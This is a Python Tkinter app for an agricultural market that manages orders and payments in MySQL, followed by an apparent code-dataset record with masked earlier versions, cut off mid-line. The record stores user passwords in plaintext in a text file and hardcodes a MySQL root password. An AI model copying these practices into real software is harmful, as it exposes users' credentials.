    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #window
    label=Label(root,text='Orders Table',font=('Times new roman',15),bg='white')
    label.place(x=350,y=10)
    Button = tk.Button(root, text="Back", font=("Arial", 15),command=entity_page)
    Button.place(x=10, y=50)
    Button = tk.Button(root, text="Insert", font=("Arial", 15),command=insert_ord)
    Button.place(x=110, y=50)
    Button = tk.Button(root, text="Delete", font=("Arial", 15),command=delete_ord)
    Button.place(x=210, y=50)
    Button = tk.Button(root, text="Update", font=("Arial", 15),command=update_ord)
    Button.place(x=310, y=50)
    Button = tk.Button(root, text="Search", font=("Arial", 15),command=search_ord)
    Button.place(x=410, y=50)
    view_ord()
def view_ord():
    """Show all rows of the `orders` table in a scrollable Treeview."""
    frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')
    frame.place(x=10,y=100,width=750,height=400)
    x_scroll=Scrollbar(frame,orient=HORIZONTAL)
    y_scroll=Scrollbar(frame,orient=VERTICAL)
    table=ttk.Treeview(frame,columns=("or_id",'or_date','or_fid','or_formula','or_to'),xscrollcommand=x_scroll.set,
    yscrollcommand=y_scroll.set)
    x_scroll.pack(side=BOTTOM,fill=X)
    y_scroll.pack(side=RIGHT,fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    table.heading('or_id',text="Order Id")
    table.heading('or_date',text="Order Date")
    table.heading('or_fid',text="Ordered Farmer Id")
    table.heading('or_formula',text="Order (item)formula")
    table.heading('or_to',text="Order to")
    #table.heading('f_address',text="Farmer Address")
    # Hide the implicit first tree column; display only the headings above.
    table['show']='headings'
    #table.column("f_id",width=100)
    table.pack()
    cur.execute("SELECT * FROM orders;")
    data =cur.fetchall()
    db.commit()
    if len(data)!=0:
        for row in data:
            table.insert('',END,values=row)
# Module-level placeholders so the shared entry globals exist before any form builds them.
e1,e2,e3,e4,e5,e6=0,0,0,0,0,0
def insert_ord():
    """Render the 'insert order' form; the date entry is pre-filled with now()."""
    global e1,e2,e3,e4,e5,e6
    #clean the window
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #create the window
    label=Label(root,text='Order Id',font=('Times new roman',20),bg='white')
    label.place(x=50,y=10)
    label=Label(root,text='Order date',font=('Times new roman',20),bg='white')
    label.place(x=50,y=60)
    label=Label(root,text='Order FID',font=('Times new roman',20),bg='white')
    label.place(x=50,y=110)
    label=Label(root,text='Order formula',font=('Times new roman',20),bg='white')
    label.place(x=50,y=160)
    label=Label(root,text='Order to',font=('Times new roman',20),bg='white')
    label.place(x=50,y=210)
    e1=Entry(root,width=50)
    e2=Entry(root,width=50)
    e3=Entry(root,width=50)
    e4=Entry(root,width=50)
    e5=Entry(root,width=50)
    #e6=Entry(root,width=50)
    e1.place(x=350,y=10)
    e2.place(x=350,y=60)
    # Default the order date to the current timestamp.
    e2.insert(0,datetime.now())
    e3.place(x=350,y=110)
    e4.place(x=350,y=160)
    e5.place(x=350,y=210)
    #e6.place(x=350,y=270)
    Button = tk.Button(root, text="Back", font=("Arial", 15),command=orders)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text="Commit", font=("Arial", 15),command=insert_ord_command)
    Button.place(x=400, y=400)
def insert_ord_command():
    """Insert a new orders row from the five form entries; on failure re-show the form."""
    try:
        sql="INSERT INTO orders values(%s,%s,%s,%s,%s);"
        vals=e1.get(),e2.get(),e3.get(),e4.get(),e5.get()
        cur.executemany(sql,[vals])
        db.commit()
        orders()
    except:
        # NOTE(review): bare except — a failed insert silently re-renders the form.
        insert_ord()
def delete_ord():
    """Render the 'delete order' form: one entry for the order id key."""
    global e1
    #clean
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #window
    label=Label(root,text='Order Id:',font=('Times new roman',20),bg='tomato')
    label.place(x=100,y=200)
    e1=Entry(root,width=50)
    e1.place(x=300,y=200)
    Button = tk.Button(root, text="Back", font=("Arial", 15),command=orders)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text="Commit", font=("Arial", 15),command=delete_ord_command)
    Button.place(x=400, y=400)
def delete_ord_command():
    """Delete the orders row whose or_id matches e1; return to the orders list on success."""
    try:
        sql="DELETE FROM orders WHERE or_id=%s;"
        cur.execute(sql,[e1.get()])
        db.commit()
        orders()
    except:
        # NOTE(review): bare except hides the real DB error; only a generic label is shown.
        l=Label(root,text='Invalid Entry',font=('times new roman',15))
        l.place(x=100,y=300)
def update_ord():
    """Ask for the id of the order to edit; OK loads it via update_or."""
    global e1
    #clean
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #window
    label=Label(root,text='Order Id:',font=('Times new roman',20),bg='tomato')
    label.place(x=100,y=200)
    e1=Entry(root,width=50)
    e1.place(x=300,y=200)
    Button = tk.Button(root, text="OK", font=("Arial", 15),command=update_or)
    Button.place(x=300, y=400)
def update_or():
    """Load the orders row keyed by e1 into editable entries; Modify commits via update_command_ord.

    On any failure (no matching row, DB error) an error label is shown and
    the order-id prompt is rendered again.
    """
    try:
        global e1,e2,e3,e4,e5,e6
        #clean
        label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
        label.place(x=0,y=0)
        sql='SELECT * FROM orders WHERE or_id=%s;'
        vals=[e1.get()]
        cur.execute(sql,vals)
        label=Label(root,text='Order Id',font=('Times new roman',20),bg='white')
        label.place(x=50,y=10)
        label=Label(root,text='Order Date',font=('Times new roman',20),bg='white')
        label.place(x=50,y=60)
        label=Label(root,text='Order f_id',font=('Times new roman',20),bg='white')
        label.place(x=50,y=110)
        label=Label(root,text='Order formula',font=('Times new roman',20),bg='white')
        label.place(x=50,y=160)
        label=Label(root,text='Order to',font=('Times new roman',20),bg='white')
        label.place(x=50,y=210)
        e1=Entry(root)
        e2=Entry(root)
        e3=Entry(root)
        e4=Entry(root)
        e5=Entry(root)
        #e6=Entry(root)
        data=cur.fetchall()
        # NOTE(review): e6 here is the module-level int placeholder, not an
        # Entry; it is only safe because an orders row has five columns so
        # index 5 is never reached.  data[0] raises IndexError when no row
        # matched, which lands in the except branch.
        arr=[e1,e2,e3,e4,e5,e6]
        count=0
        for val in data[0]:
            arr[count].insert(0,val)
            count+=1
        e1.place(x=350,y=10)
        e2.place(x=350,y=60)
        #e2.insert(0,datetime.now())
        e3.place(x=350,y=110)
        e4.place(x=350,y=160)
        e5.place(x=350,y=210)
        #e6.place(x=350,y=270)
        label=Button(root,text='Modify',font=('Times new roman',20),bg='blue',command=update_command_ord)
        label.place(x=300,y=400)
    except:
        l=Label(root,text='Invalid Order_id',font=('times new roman',15))
        l.place(x=100,y=300)
        update_ord()
def update_command_ord():
    """Persist the edited order entries back to the DB, keyed by or_id."""
    sql="UPDATE orders SET or_date=%s,or_fid=%s,or_formula=%s,or_to=%s WHERE or_id=%s;"
    vals=e2.get(),e3.get(),e4.get(),e5.get(),e1.get()
    # One statement, one parameter tuple: execute() is the right call (the
    # original wrapped the tuple in a list just to use executemany()).
    cur.execute(sql,vals)
    db.commit()
    orders()
def search_ord():
    """Render the 'search order' form: one entry for the order id key."""
    global e1
    #clean
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #window
    label=Label(root,text='Order Id:',font=('Times new roman',20),bg='tomato')
    label.place(x=100,y=200)
    e1=Entry(root,width=50)
    e1.place(x=300,y=200)
    Button = tk.Button(root, text="Back", font=("Arial", 15),command=orders)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text="Search", font=("Arial", 15),command=search_or)
    Button.place(x=400, y=400)
def search_or():
    """Look up the orders row keyed by the id in e1 and display its fields as labels."""
    #clean
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    try:
        sql='SELECT * FROM orders WHERE or_id=%s;'
        val=[e1.get()]
        cur.execute(sql,val)
        Button = tk.Button(root, text="OK", font=("Arial", 15),command=orders)
        Button.place(x=300, y=400)
        # Iterating the cursor yields the matched row(s); each column is shown
        # on its own line with a caption from `names`.
        for val in cur:
            count=0
            Y=50
            names=['order Id: ','Order date: ','Order fid: ','Order formula: ','order to: ']
            for i in val:
                label=Label(root,text=names[count]+str(i),font=('Times new roman',20),bg='tomato')
                label.place(x=10,y=Y)
                Y+=50
                count+=1
        db.commit()
    except:
        # NOTE(review): bare except — any failure re-renders the search form.
        l=Label(root,text='Invalid order id',font=('times new roman',15))
        l.place(x=100,y=300)
        search_ord()
#payment page
def payment():
    """Render the Payment screen: CRUD buttons plus the payment table view."""
    global root
    #clean previous window
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #window
    label=Label(root,text='Payment Table',font=('Times new roman',15),bg='white')
    label.place(x=350,y=10)
    Button = tk.Button(root, text="Back", font=("Arial", 15),command=entity_page)
    Button.place(x=10, y=50)
    Button = tk.Button(root, text="Insert", font=("Arial", 15),command=insert_pay)
    Button.place(x=110, y=50)
    Button = tk.Button(root, text="Delete", font=("Arial", 15),command=delete_pay)
    Button.place(x=210, y=50)
    Button = tk.Button(root, text="Update", font=("Arial", 15),command=update_pay)
    Button.place(x=310, y=50)
    Button = tk.Button(root, text="Search", font=("Arial", 15),command=search_pay)
    Button.place(x=410, y=50)
    view_pay()
def view_pay():
    """Show all rows of the `payment` table in a scrollable Treeview."""
    frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')
    frame.place(x=10,y=100,width=750,height=400)
    x_scroll=Scrollbar(frame,orient=HORIZONTAL)
    y_scroll=Scrollbar(frame,orient=VERTICAL)
    table=ttk.Treeview(frame,columns=("trans_id",'p_f_id','p_date','p_amount','p_method'),xscrollcommand=x_scroll.set,
    yscrollcommand=y_scroll.set)
    x_scroll.pack(side=BOTTOM,fill=X)
    y_scroll.pack(side=RIGHT,fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    table.heading('trans_id',text="Transaction Id")
    table.heading('p_f_id',text="Farmer Id")
    table.heading('p_date',text="Payment Date")
    table.heading('p_amount',text="Amount")
    table.heading('p_method',text="Payment Method")
    #table.heading('f_address',text="Farmer Address")
    # Hide the implicit first tree column; display only the headings above.
    table['show']='headings'
    #table.column("f_id",width=100)
    table.pack()
    cur.execute("SELECT * FROM payment;")
    data =cur.fetchall()
    db.commit()
    if len(data)!=0:
        for row in data:
            table.insert('',END,values=row)
# Re-initialise the shared entry globals before the payment forms rebuild them.
e1,e2,e3,e4,e5,e6=0,0,0,0,0,0
def insert_pay():
    """Render the 'insert payment' form; date pre-filled, method picked from an OptionMenu."""
    global e1,e2,e3,e4,e5,e6
    #clean the window
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #create the window
    label=Label(root,text='Transaction Id',font=('Times new roman',20),bg='white')
    label.place(x=50,y=10)
    label=Label(root,text='Transaction farmer id',font=('Times new roman',20),bg='white')
    label.place(x=50,y=60)
    label=Label(root,text='Transaction date',font=('Times new roman',20),bg='white')
    label.place(x=50,y=110)
    label=Label(root,text='Transaction amount',font=('Times new roman',20),bg='white')
    label.place(x=50,y=160)
    label=Label(root,text='Transaction method',font=('Times new roman',20),bg='white')
    label.place(x=50,y=210)
    e1=Entry(root,width=50)
    e2=Entry(root,width=50)
    e3=Entry(root,width=50)
    e4=Entry(root,width=50)
    e5=Entry(root,width=50)
    #e6=Entry(root,width=50)
    e1.place(x=350,y=10)
    e2.place(x=350,y=60)
    #e2.insert(0,datetime.now())
    e3.place(x=350,y=110)
    # Default the payment date to the current timestamp.
    e3.insert(0,datetime.now())
    e4.place(x=350,y=160)
    #e5.place(x=350,y=210)
    # e5 is rebound from an Entry to a StringVar driving the method dropdown;
    # insert_pay_command reads it via the same .get() interface.
    e5 = StringVar(root)
    # NOTE(review): the default 'Debit card' is not among the OptionMenu
    # choices below, so once changed it cannot be re-selected — confirm intent.
    e5.set("Debit card") # default value
    w= OptionMenu(root, e5, "Credit Card", "UPI", "Cheque","Cash")
    w.place(x=350,y=210)
    #mainloop()
    #e6.place(x=350,y=270)
    Button = tk.Button(root, text="Back", font=("Arial", 15),command=payment)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text="Commit", font=("Arial", 15),command=insert_pay_command)
    Button.place(x=400, y=400)
def insert_pay_command():
    """Insert a new payment row from the form entries; on failure re-show the form."""
    try:
        sql="INSERT INTO payment values(%s,%s,%s,%s,%s);"
        vals=e1.get(),e2.get(),e3.get(),e4.get(),e5.get()
        cur.executemany(sql,[vals])
        db.commit()
        payment()
    except:
        # NOTE(review): bare except — a failed insert silently re-renders the form.
        insert_pay()
def delete_pay():
    """Render the 'delete payment' form: one entry for the transaction id key."""
    global e1
    #clean
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #window
    label=Label(root,text='Transaction Id:',font=('Times new roman',20),bg='tomato')
    label.place(x=100,y=200)
    e1=Entry(root,width=50)
    e1.place(x=300,y=200)
    Button = tk.Button(root, text="Back", font=("Arial", 15),command=payment)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text="Commit", font=("Arial", 15),command=delete_pay_command)
    Button.place(x=400, y=400)
def delete_pay_command():
    """Delete the payment row whose trans_id matches e1; return to the payment list on success."""
    try:
        sql="DELETE FROM payment WHERE trans_id=%s;"
        cur.execute(sql,[e1.get()])
        db.commit()
        payment()
    except:
        # NOTE(review): bare except hides the real DB error; only a generic label is shown.
        l=Label(root,text='Invalid Entry',font=('times new roman',15))
        l.place(x=100,y=300)
def update_pay():
    """Ask for the transaction id of the payment to edit; OK loads it via update_pa."""
    global e1
    #clean
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #window
    label=Label(root,text='Transaction Id:',font=('Times new roman',20),bg='tomato')
    label.place(x=100,y=200)
    e1=Entry(root,width=50)
    e1.place(x=300,y=200)
    Button = tk.Button(root, text="OK", font=("Arial", 15),command=update_pa)
    Button.place(x=300, y=400)
def update_pa():
    """Load the payment row keyed by the transaction id in e1 into editable widgets.

    The first four columns (trans_id, farmer id, date, amount) go into Entry
    widgets; the payment method is shown in an OptionMenu driven by a
    StringVar.  A Modify button commits via ``update_command_pay``.  On any
    failure an error label is shown and the prompt is rendered again.
    """
    try:
        global e1,e2,e3,e4,e5
        # Blank out the previous screen.
        label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
        label.place(x=0,y=0)
        sql='SELECT * FROM payment WHERE trans_id=%s;'
        vals=[e1.get()]
        cur.execute(sql,vals)
        label=Label(root,text='Transaction Id',font=('Times new roman',20),bg='white')
        label.place(x=50,y=10)
        label=Label(root,text='Farmer_id',font=('Times new roman',20),bg='white')
        label.place(x=50,y=60)
        label=Label(root,text='Transaction date',font=('Times new roman',20),bg='white')
        label.place(x=50,y=110)
        label=Label(root,text='Transaction amount',font=('Times new roman',20),bg='white')
        label.place(x=50,y=160)
        label=Label(root,text='Transaction method',font=('Times new roman',20),bg='white')
        label.place(x=50,y=210)
        e1=Entry(root)
        e2=Entry(root)
        e3=Entry(root)
        e4=Entry(root)
        data=cur.fetchall()
        # IndexError when no row matched -> except branch below.
        row=data[0]
        for entry,value in zip((e1,e2,e3,e4),row[:4]):
            entry.insert(0,value)
        e1.place(x=350,y=10)
        e2.place(x=350,y=60)
        e3.place(x=350,y=110)
        e4.place(x=350,y=160)
        # The method column is edited through a dropdown; e5 exposes .get()
        # just like the Entries, so update_command_pay reads it unchanged.
        e5 = StringVar(root)
        # Bug fix: pre-select the stored payment method instead of always
        # resetting the dropdown to 'Debit card' (which silently discarded
        # the fetched value in the original).
        e5.set(row[4])
        w= OptionMenu(root, e5, "Credit Card", "UPI", "Cheque","Cash")
        w.place(x=350,y=210)
        label=Button(root,text='Modify',font=('Times new roman',20),bg='blue',command=update_command_pay)
        label.place(x=300,y=400)
    except Exception:
        # Bug fix: the message previously read 'Invalid Order_id' on the
        # payment screen.
        l=Label(root,text='Invalid Transaction Id',font=('times new roman',15))
        l.place(x=100,y=300)
        update_pay()
def update_command_pay():
    """Persist the edited payment fields back to the DB, keyed by trans_id."""
    sql="UPDATE payment SET p_f_id=%s,p_date=%s,p_amount=%s,p_method=%s WHERE trans_id=%s;"
    vals=e2.get(),e3.get(),e4.get(),e5.get(),e1.get()
    # One statement, one parameter tuple: execute() is the right call (the
    # original wrapped the tuple in a list just to use executemany()).
    cur.execute(sql,vals)
    db.commit()
    payment()
def search_pay():
    """Render the 'search payment' form: one entry for the transaction id key."""
    global e1
    #clean
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #window2
    label=Label(root,text='Transaction Id:',font=('Times new roman',20),bg='tomato')
    label.place(x=100,y=200)
    e1=Entry(root,width=50)
    e1.place(x=300,y=200)
    Button = tk.Button(root, text="Back", font=("Arial", 15),command=payment)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text="Search", font=("Arial", 15),command=search_pa)
    Button.place(x=400, y=400)
def search_pa():
    """Look up the payment row keyed by the transaction id in e1 and display
    its fields as labels; on failure show an error and re-render the form."""
    # Blank out the previous screen.
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    try:
        sql='SELECT * FROM payment WHERE trans_id=%s;'
        val=[e1.get()]
        cur.execute(sql,val)
        Button = tk.Button(root, text="OK", font=("Arial", 15),command=payment)
        Button.place(x=300, y=400)
        # Iterating the cursor yields the matched row(s); each column is shown
        # on its own line with a caption from `names`.
        names=['Transaction Id: ','Transaction fid: ','Transaction date: ','Transaction amount: ','Transaction method: ']
        for val in cur:
            Y=50
            for count,i in enumerate(val):
                label=Label(root,text=names[count]+str(i),font=('Times new roman',20),bg='tomato')
                label.place(x=10,y=Y)
                Y+=50
        db.commit()
    except Exception:
        # Bug fix: the message previously read 'Invalid order id' on the
        # payment screen.
        l=Label(root,text='Invalid Transaction Id',font=('times new roman',15))
        l.place(x=100,y=300)
        search_pay()
# Build the login screen into the root window, then hand control to the
# Tk event loop (blocks here until the window is closed).
First_page(root)
root.mainloop()
|
flexible
|
{
"blob_id": "9f3fcc6e097e37479e3ccf1385f20d70d7c3b6c7",
"index": 8228,
"step-1": "<mask token>\n\n\ndef First_page(root):\n global T1, T2, T3\n frame = Frame(root, height=500, width=800, bg='ivory')\n frame.pack()\n label = Label(root, text='WELCOME TO AGRI MARKET', font=(\n 'Times new roman', 25))\n label.place(x=200, y=50)\n button = Button(root, text='LogIn', font=('times new roman', 20),\n command=check_pass, bg='green')\n button.place(x=350, y=350)\n L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')\n L1.place(x=150, y=200)\n T1 = tk.Entry(root, width=30, bd=5)\n T1.place(x=280, y=200)\n L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')\n L2.place(x=150, y=250)\n T2 = tk.Entry(root, width=30, show='*', bd=5)\n T2.place(x=280, y=250)\n reg_button = Button(root, text='Register', font=('Arial Bold', 15), bg=\n 'blue', command=create_pass)\n reg_button.place(x=340, y=400)\n\n\n<mask token>\n\n\ndef create_pass():\n global root, T1, T2, T3\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'ivory')\n label.place(x=0, y=0)\n L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')\n L1.place(x=150, y=200)\n T1 = tk.Entry(root, width=30, bd=5)\n T1.place(x=380, y=200)\n L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')\n L2.place(x=150, y=250)\n T2 = tk.Entry(root, width=30, show='*', bd=5)\n T2.place(x=380, y=250)\n L2 = tk.Label(root, text='Confirm Password', font=('Arial Bold', 15),\n bg='ivory')\n L2.place(x=150, y=300)\n T3 = tk.Entry(root, width=30, show='*', bd=5)\n T3.place(x=380, y=300)\n reg_button = Button(root, text='Done', font=('Arial Bold', 15), bg=\n 'blue', command=add_pass)\n reg_button.place(x=440, y=400)\n\n\ndef add_pass():\n global root, T1, T2, T3\n if T2.get() != T3.get():\n label = Label(root, text='Incorrect Password. 
Enter again', font=(\n 'times new roman', 20))\n label.place(x=100, y=100)\n else:\n try:\n with open('password.txt', 'r') as f:\n data = f.read()\n with open('password.txt', 'w') as f:\n f.write(data + '\\n')\n f.write(T1.get() + '=' + T2.get())\n entity_page()\n except:\n with open('password.txt', 'w') as f:\n f.write(T1.get() + '=' + T2.get())\n entity_page()\n\n\ndef entity_page():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'ivory')\n label.place(x=0, y=0)\n label = Label(root, text='WELCOME TO AGRI MARKET ', font=(\n 'Times new roman', 20), bg='blue')\n label.place(x=200, y=20)\n label = Label(root, text='Choose the Entity ', font=('Times new roman',\n 20), bg='white')\n label.place(x=250, y=100)\n Button = tk.Button(root, text='Farmers', font=('Arial', 15), command=farmer\n )\n Button.place(x=100, y=150 + 25)\n Button = tk.Button(root, text='Company', font=('Arial', 15), command=\n company)\n Button.place(x=300, y=150 + 25)\n Button = tk.Button(root, text='Fertilizer', font=('Arial', 15), command\n =fertilizer)\n Button.place(x=500, y=150 + 25)\n Button = tk.Button(root, text='Order', font=('Arial', 15), command=orders)\n Button.place(x=200, y=300 + 25)\n Button = tk.Button(root, text='Payment', font=('Arial', 15), command=\n payment)\n Button.place(x=400, y=300 + 25)\n Button = tk.Button(root, text='GET BOOKING HISTORY', font=('Arial', 15),\n command=history)\n Button.place(x=200, y=400 + 25)\n\n\ndef history():\n global root, cur, db\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n cur.execute('CALL getMonth(%s);', [datetime.today().strftime('%m')])\n data = cur.fetchall()\n label = Label(root, text='The Transaction History of this month', font=\n ('Arial', 15))\n label.place(x=200, y=20)\n button = Button(root, text='BACK', command=entity_page)\n button.place(x=20, y=20)\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, 
y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',\n 'p_amount', 'p_method'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('trans_id', text='Transaction Id')\n table.heading('p_f_id', text='Farmer Id')\n table.heading('p_date', text='Payment Date')\n table.heading('p_amount', text='Amount')\n table.heading('p_method', text='Payment Method')\n table['show'] = 'headings'\n table.pack()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n db.close()\n db = mysql.connector.connect(host='localhost', user='root', passwd=\n 'bhushi', database='farmer_app')\n cur = db.cursor()\n\n\n<mask token>\n\n\ndef view_farmer():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('f_id', 'f_name', 'f_phone',\n 'f_mail', 'f_locality', 'f_address'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('f_id', text='Farmer Id')\n table.heading('f_name', text='Farmer Name')\n table.heading('f_phone', text='Farmer Phone')\n table.heading('f_mail', text='Farmer Mail')\n table.heading('f_locality', text='Farmer Locality')\n table.heading('f_address', text='Farmer Address')\n table['show'] = 'headings'\n table.column('f_id', width=100)\n table.pack()\n cur.execute('SELECT * FROM farmer;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, 
values=row)\n\n\n<mask token>\n\n\ndef insert_farmer():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer_id', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=10)\n label = Label(root, text='Farmer_name', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Farmer_phone', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Farmer_mail', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Farmer_locality', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=210)\n label = Label(root, text='Farmer_address', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=270)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e6 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n e6.place(x=350, y=270)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_farmer_command)\n Button.place(x=400, y=400)\n\n\n<mask token>\n\n\ndef invalid(page):\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n if page == 'farmer':\n label = Label(root, text='Enter valid farmer_id', font=(\n 'Times new roman', 30), bg='white')\n label.place(x=170, y=200)\n button = Button(root, text='Re-enter', font=('Times new roman', 20),\n command=insert_farmer)\n button.place(x=300, y=400)\n elif page == 'company':\n label = Label(root, text='Enter valid company_id', font=(\n 'Times new roman', 30), bg='white')\n 
label.place(x=170, y=200)\n button = Button(root, text='Re-enter', font=('Times new roman', 20),\n command=insert_company)\n button.place(x=300, y=400)\n\n\n<mask token>\n\n\ndef delete_farmer_command():\n try:\n sql = 'DELETE FROM farmer WHERE f_id=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n farmer()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\ndef update_farmer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg\n ='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=update)\n Button.place(x=300, y=400)\n\n\n<mask token>\n\n\ndef update_command():\n try:\n sql = (\n 'UPDATE farmer SET f_name=%s,f_phone_no=%s,f_mail=%s,f_locality=%s,f_address=%s WHERE f_id=%s;'\n )\n vals = e2.get(), e3.get(), e4.get(), e5.get(), e6.get(), e1.get()\n cur.executemany(sql, [vals])\n db.commit()\n farmer()\n except:\n update_farmer()\n\n\ndef search_farmer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg\n ='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=search)\n Button.place(x=400, y=400)\n\n\ndef search():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM farmer WHERE f_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=farmer)\n Button.place(x=300, 
y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['farmer id: ', 'farmer name: ', 'farmer phone: ',\n 'farmer mail: ', 'farmer locality: ', 'farmer address: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Farmer Id', font=('times new roman', 15))\n l.place(x=100, y=300)\n search_farmer()\n\n\ndef company():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_company)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_company)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_company)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_company)\n Button.place(x=410, y=50)\n view_company()\n\n\ndef view_company():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('c_id', 'c_name', 'c_address'),\n xscrollcommand=x_scroll.set, yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('c_id', text='Company Id')\n 